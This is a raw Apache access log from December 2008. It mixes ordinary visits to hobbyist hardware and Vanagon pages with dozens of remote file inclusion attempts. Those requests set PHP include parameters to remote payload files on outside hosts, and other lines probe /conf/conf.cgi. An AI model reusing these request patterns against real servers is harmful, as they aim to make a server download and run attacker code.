64.18.142.194 - - [14/Dec/2008:05:02:49 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://uploader.ws/upload/200812/FX29ID1.txt?? HTTP/1.1" 404 238
64.18.142.194 - - [14/Dec/2008:05:02:49 -0500] "GET /logs/access_log.4//modules/TotalCalendar/about.php?inc_dir=http://uploader.ws/upload/200812/FX29ID1.txt?? HTTP/1.1" 404 256
64.18.142.194 - - [14/Dec/2008:05:02:53 -0500] "GET /logs/access_log.3//modules/TotalCalendar/about.php?inc_dir=http://uploader.ws/upload/200812/FX29ID1.txt?? HTTP/1.1" 404 256
66.199.253.186 - - [14/Dec/2008:05:03:00 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
65.55.220.216 - - [14/Dec/2008:05:03:09 -0500] "GET /robots.txt HTTP/1.1" 404 216
65.55.220.216 - - [14/Dec/2008:05:03:09 -0500] "GET /docs/rhl-gsg-6.1en/figs/navigating/pipes1.gif HTTP/1.1" 200 8433
212.181.85.11 - - [14/Dec/2008:05:03:09 -0500] "GET /logs/access_log.4/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.samilglass.com/images/bajoid.txt??? HTTP/1.1" 404 278
212.181.85.11 - - [14/Dec/2008:05:03:10 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.samilglass.com/images/bajoid.txt??? HTTP/1.1" 404 260
212.181.85.11 - - [14/Dec/2008:05:03:11 -0500] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.samilglass.com/images/bajoid.txt??? HTTP/1.1" 404 265
212.181.85.11 - - [14/Dec/2008:05:03:14 -0500] "GET /logs/access_log.4/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.samilglass.com/images/bajoid.txt??? HTTP/1.1" 404 278
212.181.85.11 - - [14/Dec/2008:05:03:14 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.samilglass.com/images/bajoid.txt??? HTTP/1.1" 404 260
212.181.85.11 - - [14/Dec/2008:05:03:15 -0500] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.samilglass.com/images/bajoid.txt??? HTTP/1.1" 404 265
89.249.18.13 - - [14/Dec/2008:05:04:25 -0500] "GET /errors.php?error=http://www.becabioinfo.org/bbrweb//contenido/cronjobs/idrfi.txt?? HTTP/1.1" 404 216
216.180.251.146 - - [14/Dec/2008:05:04:28 -0500] "GET /logs/access_log.3//modules/xfsection/modify.php?dir_module=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 253
216.180.251.146 - - [14/Dec/2008:05:04:28 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 235
216.180.251.146 - - [14/Dec/2008:05:04:28 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 240
216.246.60.183 - - [14/Dec/2008:05:04:45 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://vcd.co.uk/media/id.txt?? HTTP/1.1" 404 260
216.180.251.146 - - [14/Dec/2008:05:05:03 -0500] "GET /logs/access_log.3//modules/xfsection/modify.php?dir_module=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 253
216.180.251.146 - - [14/Dec/2008:05:05:03 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 240
216.180.251.146 - - [14/Dec/2008:05:05:03 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 235
80.67.22.215 - - [14/Dec/2008:05:05:12 -0500] "GET /logs/error_log/errors.php?error=http://www.becabioinfo.org/bbrweb//contenido/cronjobs/idrfi.txt?? HTTP/1.1" 404 231
80.67.22.215 - - [14/Dec/2008:05:05:12 -0500] "GET /errors.php?error=http://www.becabioinfo.org/bbrweb//contenido/cronjobs/idrfi.txt?? HTTP/1.1" 404 216
80.67.22.215 - - [14/Dec/2008:05:05:12 -0500] "GET /logs/errors.php?error=http://www.becabioinfo.org/bbrweb//contenido/cronjobs/idrfi.txt?? HTTP/1.1" 404 221
72.30.79.36 - - [14/Dec/2008:05:06:36 -0500] "GET /bookmarks_public.html HTTP/1.0" 200 50362
80.67.22.215 - - [14/Dec/2008:05:07:50 -0500] "GET /logs/error_log.1/errors.php?error=http://www.becabioinfo.org/bbrweb//contenido/cronjobs/idrfi.txt?? HTTP/1.1" 404 233
80.67.22.215 - - [14/Dec/2008:05:07:50 -0500] "GET /errors.php?error=http://www.becabioinfo.org/bbrweb//contenido/cronjobs/idrfi.txt?? HTTP/1.1" 404 216
80.67.22.215 - - [14/Dec/2008:05:07:51 -0500] "GET /logs/errors.php?error=http://www.becabioinfo.org/bbrweb//contenido/cronjobs/idrfi.txt?? HTTP/1.1" 404 221
4.250.12.83 - - [14/Dec/2008:05:07:54 -0500] "GET /~strabal/lucypics/main.html HTTP/1.1" 200 38481
4.250.12.83 - - [14/Dec/2008:05:07:56 -0500] "GET /~strabal/lucypics/bg6.jpg HTTP/1.1" 200 13741
4.250.12.83 - - [14/Dec/2008:05:08:00 -0500] "GET /~strabal/lucypics/brian.jpg HTTP/1.1" 200 27638
4.250.12.83 - - [14/Dec/2008:05:08:01 -0500] "GET /~strabal/lucypics/BRAVAD~1.MID HTTP/1.1" 200 68315
4.250.12.83 - - [14/Dec/2008:05:08:01 -0500] "GET /~strabal/lucypics/PV.jpg HTTP/1.1" 200 23133
222.236.47.182 - - [14/Dec/2008:05:08:04 -0500] "GET /logs/error_log.3//mambots/content/multithumb/errors.php?error=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 261
222.236.47.182 - - [14/Dec/2008:05:08:11 -0500] "GET //mambots/content/multithumb/errors.php?error=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 244
222.236.47.182 - - [14/Dec/2008:05:08:17 -0500] "GET /logs//mambots/content/multithumb/errors.php?error=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 249
72.46.157.162 - - [14/Dec/2008:05:08:21 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
87.230.10.13 - - [14/Dec/2008:05:09:51 -0500] "GET /logs/error_log.4/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://millionaire-secrets.bikaigroup.us/images/pulaid.txt??? HTTP/1.1" 404 259
87.230.10.13 - - [14/Dec/2008:05:09:51 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://millionaire-secrets.bikaigroup.us/images/pulaid.txt??? HTTP/1.1" 404 242
87.230.10.13 - - [14/Dec/2008:05:09:51 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://millionaire-secrets.bikaigroup.us/images/pulaid.txt??? HTTP/1.1" 404 247
62.0.138.183 - - [14/Dec/2008:05:10:18 -0500] "GET /sunFAQ/serial/ HTTP/1.1" 200 13600
62.0.138.183 - - [14/Dec/2008:05:10:19 -0500] "GET /images/logo_small.gif HTTP/1.1" 200 4441
62.0.138.183 - - [14/Dec/2008:05:10:19 -0500] "GET /sunFAQ/serial/pin_ports.jpg HTTP/1.1" 200 15579
62.0.138.183 - - [14/Dec/2008:05:10:19 -0500] "GET /sunFAQ/serial/9.gif HTTP/1.1" 200 2263
62.0.138.183 - - [14/Dec/2008:05:10:19 -0500] "GET /sunFAQ/serial/9pin.jpg HTTP/1.1" 200 13877
62.0.138.183 - - [14/Dec/2008:05:10:19 -0500] "GET /favicon.ico HTTP/1.1" 200 318
62.0.138.183 - - [14/Dec/2008:05:10:20 -0500] "GET /sunFAQ/serial/null_modem.jpg HTTP/1.1" 200 11445
62.0.138.183 - - [14/Dec/2008:05:10:20 -0500] "GET /sunFAQ/serial/8-25.gif HTTP/1.1" 200 4067
216.246.60.183 - - [14/Dec/2008:05:10:28 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://vcd.co.uk/media/id.txt?? HTTP/1.1" 404 260
65.55.232.13 - - [14/Dec/2008:05:10:30 -0500] "GET /sun_ipc/old_index.html HTTP/1.1" 304 -
85.113.250.220 - - [14/Dec/2008:05:10:56 -0500] "GET /logs///config/config_admin.php?INC=http://teksten-woorden.nl/test.txt?? HTTP/1.1" 404 236
85.113.250.220 - - [14/Dec/2008:05:10:56 -0500] "GET ///config/config_admin.php?INC=http://teksten-woorden.nl/test.txt?? HTTP/1.1" 404 231
67.195.37.153 - - [14/Dec/2008:05:11:20 -0500] "GET /~strabal/creations/bus2.html HTTP/1.0" 200 17974
65.55.234.169 - - [14/Dec/2008:05:11:30 -0500] "GET /robots.txt HTTP/1.1" 404 216
65.55.234.169 - - [14/Dec/2008:05:11:30 -0500] "GET /sunPICS/sparc10/ss10_rear.jpg HTTP/1.1" 200 16732
76.209.17.138 - - [14/Dec/2008:05:11:38 -0500] "GET /personal/vanagon_1.jpg HTTP/1.1" 200 72209
92.48.203.116 - - [14/Dec/2008:05:13:16 -0500] "GET /conf/conf.cgi HTTP/1.1" 404 219
194.8.75.175 - - [14/Dec/2008:05:13:48 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
194.8.75.175 - - [14/Dec/2008:05:13:48 -0500] "GET / HTTP/1.0" 200 12547
194.8.75.175 - - [14/Dec/2008:05:13:52 -0500] "GET /conf/ HTTP/1.0" 200 47
64.18.142.194 - - [14/Dec/2008:05:14:25 -0500] "GET //components/com_forum/download.php?phpbb_root_path=http://uploader.ws/upload/200812/FX29ID1.txt?? HTTP/1.1" 404 240
64.18.142.194 - - [14/Dec/2008:05:14:25 -0500] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://uploader.ws/upload/200812/FX29ID1.txt?? HTTP/1.1" 404 245
66.199.235.58 - - [14/Dec/2008:05:14:34 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
200.128.35.4 - - [14/Dec/2008:05:14:43 -0500] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.adswebdizajn.com//portfolio/idste.txt? HTTP/1.1" 404 250
87.230.10.13 - - [14/Dec/2008:05:14:46 -0500] "GET /logs/error_log.3/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://millionaire-secrets.bikaigroup.us/images/pulaid.txt??? HTTP/1.1" 404 259
75.101.150.3 - - [14/Dec/2008:05:14:46 -0500] "GET /sun_ipc/ HTTP/1.0" 200 9825
200.128.35.4 - - [14/Dec/2008:05:15:03 -0500] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.adswebdizajn.com//portfolio/idste.txt? HTTP/1.1" 404 250
89.249.18.13 - - [14/Dec/2008:05:15:31 -0500] "GET /logs/access_log.4/errors.php?error=http://www.becabioinfo.org/bbrweb//contenido/cronjobs/idrfi.txt?? HTTP/1.1" 404 234
89.249.18.13 - - [14/Dec/2008:05:15:31 -0500] "GET /errors.php?error=http://www.becabioinfo.org/bbrweb//contenido/cronjobs/idrfi.txt?? HTTP/1.1" 404 216
89.249.18.13 - - [14/Dec/2008:05:15:32 -0500] "GET /logs/errors.php?error=http://www.becabioinfo.org/bbrweb//contenido/cronjobs/idrfi.txt?? HTTP/1.1" 404 221
12.187.20.225 - - [14/Dec/2008:05:16:01 -0500] "GET /logs/error_log.4/convert/mvcw.php?vwar_root=http://www.bdsm-franken.de/f2/Cal//tools/rfi/id.txt? HTTP/1.1" 404 239
12.187.20.225 - - [14/Dec/2008:05:16:01 -0500] "GET /logs/error_log.4/convert/mvcw.php?step=1&vwar_root=http://www.bdsm-franken.de/f2/Cal//tools/rfi/id.txt? HTTP/1.1" 404 239
12.187.20.225 - - [14/Dec/2008:05:16:01 -0500] "GET /convert/mvcw.php?step=1&vwar_root=http://www.bdsm-franken.de/f2/Cal//tools/rfi/id.txt? HTTP/1.1" 404 222
12.187.20.225 - - [14/Dec/2008:05:16:01 -0500] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.bdsm-franken.de/f2/Cal//tools/rfi/id.txt? HTTP/1.1" 404 227
12.187.20.225 - - [14/Dec/2008:05:16:04 -0500] "GET /convert/mvcw.php?vwar_root=http://www.bdsm-franken.de/f2/Cal//tools/rfi/id.txt? HTTP/1.1" 404 222
12.187.20.225 - - [14/Dec/2008:05:16:04 -0500] "GET /logs/convert/mvcw.php?vwar_root=http://www.bdsm-franken.de/f2/Cal//tools/rfi/id.txt? HTTP/1.1" 404 227
38.98.243.130 - - [14/Dec/2008:05:16:14 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 222
38.98.243.130 - - [14/Dec/2008:05:16:14 -0500] "GET /logs/error_log.3/phphtml.php?htmlclass_path=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 234
38.98.243.130 - - [14/Dec/2008:05:16:14 -0500] "GET /phphtml.php?htmlclass_path=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 217
38.98.243.130 - - [14/Dec/2008:05:16:46 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 222
38.98.243.130 - - [14/Dec/2008:05:16:46 -0500] "GET /logs/error_log.4/phphtml.php?htmlclass_path=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 234
38.98.243.130 - - [14/Dec/2008:05:16:46 -0500] "GET /phphtml.php?htmlclass_path=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 217
98.30.187.22 - - [14/Dec/2008:05:17:06 -0500] "GET /vanagon/VanagonProTraining/FuelSystems/111.jpg HTTP/1.1" 200 107712
98.30.187.22 - - [14/Dec/2008:05:17:06 -0500] "GET /vanagon/VanagonProTraining/DigiFant/029.jpg HTTP/1.1" 200 106938
98.30.187.22 - - [14/Dec/2008:05:17:06 -0500] "GET /vanagon/VanagonProTraining/FuelSystems/112.jpg HTTP/1.1" 200 109489
98.30.187.22 - - [14/Dec/2008:05:17:06 -0500] "GET /vanagon/VanagonProTraining/FuelSystems/113.jpg HTTP/1.1" 200 131656
208.66.72.114 - - [14/Dec/2008:05:18:09 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
89.249.18.13 - - [14/Dec/2008:05:18:24 -0500] "GET /logs/access_log.3/errors.php?error=http://www.becabioinfo.org/bbrweb//contenido/cronjobs/idrfi.txt?? HTTP/1.1" 404 234
72.30.79.36 - - [14/Dec/2008:05:18:49 -0500] "GET /~strabal/grease/photo8/grease8.html HTTP/1.0" 200 7480
62.141.2.12 - - [14/Dec/2008:05:19:19 -0500] "GET /sunPICS/ HTTP/1.1" 200 17863
62.141.2.12 - - [14/Dec/2008:05:19:21 -0500] "GET /images/logo_small.gif HTTP/1.1" 200 4441
62.141.2.12 - - [14/Dec/2008:05:19:31 -0500] "GET /sunPICS/475/475front.jpg HTTP/1.1" 200 9993
62.141.2.12 - - [14/Dec/2008:05:19:35 -0500] "GET /sunPICS/475/475processor.jpg HTTP/1.1" 200 38124
38.98.243.130 - - [14/Dec/2008:05:19:47 -0500] "GET /logs/error_log.3//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 259
38.98.243.130 - - [14/Dec/2008:05:19:47 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 242
38.98.243.130 - - [14/Dec/2008:05:19:47 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 247
194.8.75.103 - - [14/Dec/2008:05:19:49 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
194.8.75.103 - - [14/Dec/2008:05:19:49 -0500] "GET / HTTP/1.0" 200 12547
194.8.75.103 - - [14/Dec/2008:05:19:59 -0500] "GET /conf/ HTTP/1.0" 200 47
38.98.243.130 - - [14/Dec/2008:05:20:08 -0500] "GET /logs/error_log.2//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 259
38.98.243.130 - - [14/Dec/2008:05:20:08 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 242
38.98.243.130 - - [14/Dec/2008:05:20:08 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 247
72.30.79.36 - - [14/Dec/2008:05:20:57 -0500] "GET /sun_ipx/speakerfan/ HTTP/1.0" 200 6174
222.236.47.182 - - [14/Dec/2008:05:21:09 -0500] "GET /logs/access_log.4//mambots/content/multithumb/errors.php?error=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 262
66.231.188.140 - - [14/Dec/2008:05:21:14 -0500] "GET /robots.txt HTTP/1.0" 404 204
222.236.47.182 - - [14/Dec/2008:05:21:15 -0500] "GET //mambots/content/multithumb/errors.php?error=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 244
66.231.188.140 - - [14/Dec/2008:05:21:15 -0500] "GET /dec/multia/ HTTP/1.0" 200 10529
38.98.243.130 - - [14/Dec/2008:05:21:19 -0500] "GET /logs/error_log.1%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 260
222.236.47.182 - - [14/Dec/2008:05:21:21 -0500] "GET /logs//mambots/content/multithumb/errors.php?error=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 249
64.18.142.194 - - [14/Dec/2008:05:21:28 -0500] "GET //components/com_forum/download.php?phpbb_root_path=http://uploader.ws/upload/200812/FX29ID1.txt?? HTTP/1.1" 404 240
64.18.142.194 - - [14/Dec/2008:05:21:28 -0500] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://uploader.ws/upload/200812/FX29ID1.txt?? HTTP/1.1" 404 245
12.187.20.225 - - [14/Dec/2008:05:21:45 -0500] "GET /logs/error_log.3/convert/mvcw.php?vwar_root=http://www.bdsm-franken.de/f2/Cal//tools/rfi/id.txt? HTTP/1.1" 404 239
12.187.20.225 - - [14/Dec/2008:05:21:45 -0500] "GET /convert/mvcw.php?vwar_root=http://www.bdsm-franken.de/f2/Cal//tools/rfi/id.txt? HTTP/1.1" 404 222
12.187.20.225 - - [14/Dec/2008:05:21:45 -0500] "GET /logs/convert/mvcw.php?vwar_root=http://www.bdsm-franken.de/f2/Cal//tools/rfi/id.txt? HTTP/1.1" 404 227
12.187.20.225 - - [14/Dec/2008:05:21:46 -0500] "GET /logs/error_log.3/convert/mvcw.php?step=1&vwar_root=http://www.bdsm-franken.de/f2/Cal//tools/rfi/id.txt? HTTP/1.1" 404 239
12.187.20.225 - - [14/Dec/2008:05:21:46 -0500] "GET /convert/mvcw.php?step=1&vwar_root=http://www.bdsm-franken.de/f2/Cal//tools/rfi/id.txt? HTTP/1.1" 404 222
12.187.20.225 - - [14/Dec/2008:05:21:46 -0500] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.bdsm-franken.de/f2/Cal//tools/rfi/id.txt? HTTP/1.1" 404 227
203.230.142.4 - - [14/Dec/2008:05:21:57 -0500] "GET /?sourcedir=http://www.ryhmakalenteri.com/idrose.txt??? HTTP/1.1" 200 12547
203.230.142.4 - - [14/Dec/2008:05:21:58 -0500] "GET /logs/?sourcedir=http://www.ryhmakalenteri.com/idrose.txt??? HTTP/1.1" 200 2287
203.230.142.4 - - [14/Dec/2008:05:21:58 -0500] "GET /logs/access_log.3/?sourcedir=http://www.ryhmakalenteri.com/idrose.txt??? HTTP/1.1" 404 224
76.28.72.78 - - [14/Dec/2008:05:22:10 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
71.82.77.13 - - [14/Dec/2008:05:22:14 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
203.230.142.4 - - [14/Dec/2008:05:22:34 -0500] "GET /logs/access_log.4/?sourcedir=http://www.ryhmakalenteri.com/idrose.txt??? HTTP/1.1" 404 224
211.236.180.100 - - [14/Dec/2008:05:22:51 -0500] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 250
211.236.180.100 - - [14/Dec/2008:05:22:51 -0500] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 245
211.236.180.100 - - [14/Dec/2008:05:22:51 -0500] "GET /logs/error_log.2/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 262
200.27.116.182 - - [14/Dec/2008:05:22:58 -0500] "GET /logs/access_log.4//mambots/content/multithumb/errors.php?error=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 262
200.27.116.182 - - [14/Dec/2008:05:22:58 -0500] "GET //mambots/content/multithumb/errors.php?error=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 244
200.27.116.182 - - [14/Dec/2008:05:22:59 -0500] "GET /logs//mambots/content/multithumb/errors.php?error=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 249
200.128.35.4 - - [14/Dec/2008:05:23:04 -0500] "GET /logs/error_log.2//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.adswebdizajn.com//portfolio/idste.txt? HTTP/1.1" 404 267
200.128.35.4 - - [14/Dec/2008:05:23:06 -0500] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.adswebdizajn.com//portfolio/idste.txt? HTTP/1.1" 404 250
200.128.35.4 - - [14/Dec/2008:05:23:07 -0500] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.adswebdizajn.com//portfolio/idste.txt? HTTP/1.1" 404 255
200.128.35.4 - - [14/Dec/2008:05:23:18 -0500] "GET /logs/access_log.2//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.adswebdizajn.com//portfolio/idste.txt? HTTP/1.1" 404 268
76.164.220.50 - - [14/Dec/2008:05:23:18 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
211.236.180.100 - - [14/Dec/2008:05:24:03 -0500] "GET /logs/error_log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 260
211.236.180.100 - - [14/Dec/2008:05:24:03 -0500] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 245
211.236.180.100 - - [14/Dec/2008:05:24:03 -0500] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 250
194.8.75.107 - - [14/Dec/2008:05:24:14 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
194.8.75.107 - - [14/Dec/2008:05:24:14 -0500] "GET / HTTP/1.0" 200 12547
194.8.75.107 - - [14/Dec/2008:05:24:14 -0500] "GET /conf/ HTTP/1.0" 200 47
63.247.65.114 - - [14/Dec/2008:05:24:47 -0500] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/rinaputria/elsiq.txt???? HTTP/1.1" 404 246
63.247.65.114 - - [14/Dec/2008:05:24:47 -0500] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/rinaputria/elsiq.txt???? HTTP/1.1" 404 251
63.247.65.114 - - [14/Dec/2008:05:24:47 -0500] "GET /logs/error_log.3//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/rinaputria/elsiq.txt???? HTTP/1.1" 404 263
66.118.142.60 - - [14/Dec/2008:05:25:05 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.keys4life.fanfilled.com/cutenews/fellid.txt?? HTTP/1.1" 404 243
66.118.142.60 - - [14/Dec/2008:05:25:05 -0500] "GET /logs/error_log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.keys4life.fanfilled.com/cutenews/fellid.txt?? HTTP/1.1" 404 258
66.118.142.60 - - [14/Dec/2008:05:25:05 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.keys4life.fanfilled.com/cutenews/fellid.txt?? HTTP/1.1" 404 248
76.164.220.50 - - [14/Dec/2008:05:25:34 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
63.247.65.114 - - [14/Dec/2008:05:26:37 -0500] "GET /logs/access_log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/rinaputria/elsiq.txt???? HTTP/1.1" 404 262
66.40.52.28 - - [14/Dec/2008:05:26:51 -0500] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/brojollele/fx29id.txt?? HTTP/1.1" 404 246
66.40.52.28 - - [14/Dec/2008:05:26:51 -0500] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/brojollele/fx29id.txt?? HTTP/1.1" 404 251
66.40.52.28 - - [14/Dec/2008:05:27:35 -0500] "GET /logs/access_log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/brojollele/fx29id.txt?? HTTP/1.1" 404 262
66.118.142.60 - - [14/Dec/2008:05:27:48 -0500] "GET /logs/access_log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.keys4life.fanfilled.com/cutenews/fellid.txt?? HTTP/1.1" 404 259
66.118.142.60 - - [14/Dec/2008:05:27:48 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.keys4life.fanfilled.com/cutenews/fellid.txt?? HTTP/1.1" 404 243
66.118.142.60 - - [14/Dec/2008:05:27:48 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.keys4life.fanfilled.com/cutenews/fellid.txt?? HTTP/1.1" 404 248
92.48.203.116 - - [14/Dec/2008:05:28:57 -0500] "GET /conf/conf.cgi HTTP/1.1" 404 219
72.35.84.90 - - [14/Dec/2008:05:29:27 -0500] "GET /logs/access_log.4//index.php?DOCUMENT_ROOT=http://www.geocities.com/cwx.shadow/idx.txt???? HTTP/1.1" 404 234
72.35.84.90 - - [14/Dec/2008:05:29:27 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.geocities.com/cwx.shadow/idx.txt???? HTTP/1.1" 404 216
72.35.84.90 - - [14/Dec/2008:05:29:27 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.geocities.com/cwx.shadow/idx.txt???? HTTP/1.1" 404 221
194.8.75.175 - - [14/Dec/2008:05:29:41 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
194.8.75.175 - - [14/Dec/2008:05:29:41 -0500] "GET / HTTP/1.0" 200 12547
194.8.75.175 - - [14/Dec/2008:05:29:42 -0500] "GET /conf/ HTTP/1.0" 200 47
61.135.168.39 - - [14/Dec/2008:05:29:45 -0500] "GET / HTTP/1.1" 200 12547
210.0.186.231 - - [14/Dec/2008:05:30:12 -0500] "GET /logs/error_log.4/convert/mvcw.php?step=1&vwar_root=http://www.bdsm-franken.de/f2/Cal//tools/rfi/id.txt? HTTP/1.1" 404 239
210.0.186.231 - - [14/Dec/2008:05:30:16 -0500] "GET /convert/mvcw.php?step=1&vwar_root=http://www.bdsm-franken.de/f2/Cal//tools/rfi/id.txt? HTTP/1.1" 404 222
210.0.186.231 - - [14/Dec/2008:05:30:16 -0500] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.bdsm-franken.de/f2/Cal//tools/rfi/id.txt? HTTP/1.1" 404 227
218.239.45.154 - - [14/Dec/2008:05:30:35 -0500] "GET //skin/zero_vote/error.php?dir=http://www.keys4life.fanfilled.com/cutenews/idxx.txt?? HTTP/1.1" 404 231
218.239.45.154 - - [14/Dec/2008:05:30:35 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.keys4life.fanfilled.com/cutenews/idxx.txt?? HTTP/1.1" 404 236
218.239.45.154 - - [14/Dec/2008:05:30:35 -0500] "GET /logs/error_log//skin/zero_vote/error.php?dir=http://www.keys4life.fanfilled.com/cutenews/idxx.txt?? HTTP/1.1" 404 246
210.0.186.231 - - [14/Dec/2008:05:30:46 -0500] "GET /logs/error_log.4/convert/mvcw.php?vwar_root=http://www.bdsm-franken.de/f2/Cal//tools/rfi/id.txt? HTTP/1.1" 404 239
210.0.186.231 - - [14/Dec/2008:05:30:47 -0500] "GET /convert/mvcw.php?vwar_root=http://www.bdsm-franken.de/f2/Cal//tools/rfi/id.txt? HTTP/1.1" 404 222
210.0.186.231 - - [14/Dec/2008:05:30:47 -0500] "GET /logs/convert/mvcw.php?vwar_root=http://www.bdsm-franken.de/f2/Cal//tools/rfi/id.txt? HTTP/1.1" 404 227
220.181.32.22 - - [14/Dec/2008:05:30:49 -0500] "GET / HTTP/1.1" 200 12547
218.239.45.154 - - [14/Dec/2008:05:31:03 -0500] "GET //skin/zero_vote/error.php?dir=http://www.keys4life.fanfilled.com/cutenews/idxx.txt?? HTTP/1.1" 404 231
218.239.45.154 - - [14/Dec/2008:05:31:37 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.keys4life.fanfilled.com/cutenews/idxx.txt?? HTTP/1.1" 404 236
